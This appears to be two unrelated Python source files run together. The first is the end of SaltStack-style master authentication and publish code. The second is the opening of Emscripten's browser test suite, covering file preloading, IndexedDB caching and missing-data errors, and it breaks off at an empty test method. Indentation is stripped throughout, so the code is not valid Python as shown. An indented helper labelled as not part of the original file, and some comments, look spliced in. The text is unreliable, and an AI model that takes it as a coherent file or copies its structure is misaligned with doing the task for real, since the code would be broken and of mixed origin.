and self._check_autosign(load['id']):
# This is a new key and it should be automatically accepted
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError as err:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port'],
}
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name],
clear_load['fun'])
if not good:
return ''
return self.wheel_.call_func(
clear_load.pop('fun'),
**clear_load)
except Exception as exc:
log.error(
('Exception occurred in the wheel system: {0}'
).format(exc)
)
return ''
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
('Exception occurred while authenticating: {0}'
).format(exc)
)
return ''
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# Check for external auth calls
if extra.get('token', False):
# A token was passed, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
('Exception occurred when generating auth token: {0}'
).format(exc)
)
return ''
if not token:
return ''
if not token['eauth'] in self.opts['external_auth']:
return ''
if not token['name'] in self.opts['external_auth'][token['eauth']]:
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
elif 'eauth' in extra:
if not extra['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(extra)
if not name in self.opts['external_auth'][extra['eauth']]:
return ''
if not self.loadauth.time_auth(extra):
return ''
except Exception as exc:
log.error(
('Exception occurred while authenticating: {0}'
).format(exc)
)
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][extra['eauth']][name],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == 'root':
if not clear_load.pop('key') == self.key.get(self.opts.get('user', 'root')):
return ''
elif clear_load['user'] == getpass.getuser():
if not clear_load.pop('key') == self.key.get(clear_load['user']):
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if not clear_load.pop('key') == self.key[clear_load['user']]:
return ''
if not clear_load['user'] in self.opts['client_acl']:
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
else:
return ''
else:
if not clear_load.pop('key') == self.key[getpass.getuser()]:
return ''
if not clear_load['jid']:
clear_load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
jid_dir = salt.utils.jid_dir(
clear_load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
# Verify the jid dir
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
# Save the invocation information
self.serial.dump(
clear_load,
salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
)
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(
'User {user} Published command {fun} with jid {jid}'.format(
**clear_load
)
)
load['user'] = clear_load['user']
else:
log.info(
'Published command {fun} with jid {jid}'.format(
**clear_load
)
)
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
pub_sock.send(self.serial.dumps(payload))
minions = self.ckminions.check_minions(
load['tgt'],
load.get('tgt_type', 'glob')
)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized, ensure_dir
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
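# A minimal sketch (not part of the original test file) of the kind of ranged
# request the chunked server above answers when support_byte_ranges is enabled;
# the port and chunk size below are illustrative assumptions, and Python 3
# urllib is used for brevity even though the surrounding file also supports
# Python 2.
def example_fetch_first_chunk(port=11111, chunk_size=256):
    from urllib.request import Request, urlopen as _urlopen
    req = Request('http://localhost:%d/' % port)
    # The handler parses "Range: bytes=start-end" and replies with that slice.
    req.add_header('Range', 'bytes=0-%d' % (chunk_size - 1))
    return _urlopen(req).read()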
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'manual_download_data.cpp')).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On other platforms they can, so test that too.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
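# Tests --use-preload-cache: the first page load stores the .data package in IndexedDB, so the second load reports it as coming from the cache (result goes from 1 to 2).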
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
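# Like test_preload_caching, but runs the file packager manually with --use-preload-cache and a custom --indexedDB-name.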
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
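# Tests --preload-file both with individual files and with a whole directory.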
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
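# Tests loading the .data package from a custom URL ("cdn/") via Module.locateFile.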
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
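# Tests that a missing or unreachable .data package surfaces through window.onerror with the package name in the message.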
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never execute, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# a missing file should trigger xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# an unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
